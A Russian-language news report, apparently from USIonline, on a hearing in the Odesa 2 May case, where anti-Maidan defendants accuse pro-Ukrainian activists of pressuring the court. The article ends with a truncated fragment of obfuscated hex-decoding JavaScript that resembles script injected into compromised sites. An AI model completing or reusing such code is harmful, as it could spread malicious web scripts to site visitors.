Антимайдановцы обвинили патриотов в давлении на суд по делу 2 мая «фото»

Антимайдановцы обвинили патриотов в давлении на суд по делу 2 мая

 

29843a3f-86bf-4f89-ab26-a9690a355dc2

Фото: USIonline.com

Сегодня, 12 мая, должен был состояться очередной допрос главного свидетеля обвинения Александра Посмидченко, однако он не был доставлен в суд,  поскольку находится в больнице на стационарном лечении, сообщает корреспондент Украинской Службы Информации.

Во время заседания один из обвиняемых антимайдановцев Сергей Долженков зачитал коллективное обращение от арестованных активистов Куликова поля, в котором обвинил проукраинских активистов в давлении на суд.

29 апреля коллегия судей вынесла решение о продолжении содержания под стражей обвиняемых Долженкова, Корчинского,  Романюка,  Сакаулова и Мефедова.  Это решение было принято под давлением проукраинских активистов.  В частности,  эти активисты угрожали посадить судью в тюрьму,  если они вынесут не подходящее решение.  Кроме того,  перед судебным заседанием СМИ публиковали заявления этих активистов, в котором они угрожают блокировать входы и выходы СИЗО,  если суд решит выпустить антимайдановцев на свободу – зачитал Долженков.

В свою очередь,  судья Корой отметил,  что заявление в СМИ не является давлением на суд.

Про нас пишут много разного,  мы не обращаем внимание на то,  что говорят в интернете.  Это не является давлением, – подчеркнул судья.

Как сообщала USIonline.com, суд в очередной раз перенес рассмотрение дела участника событий 2 мая Сергея Ходияка.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e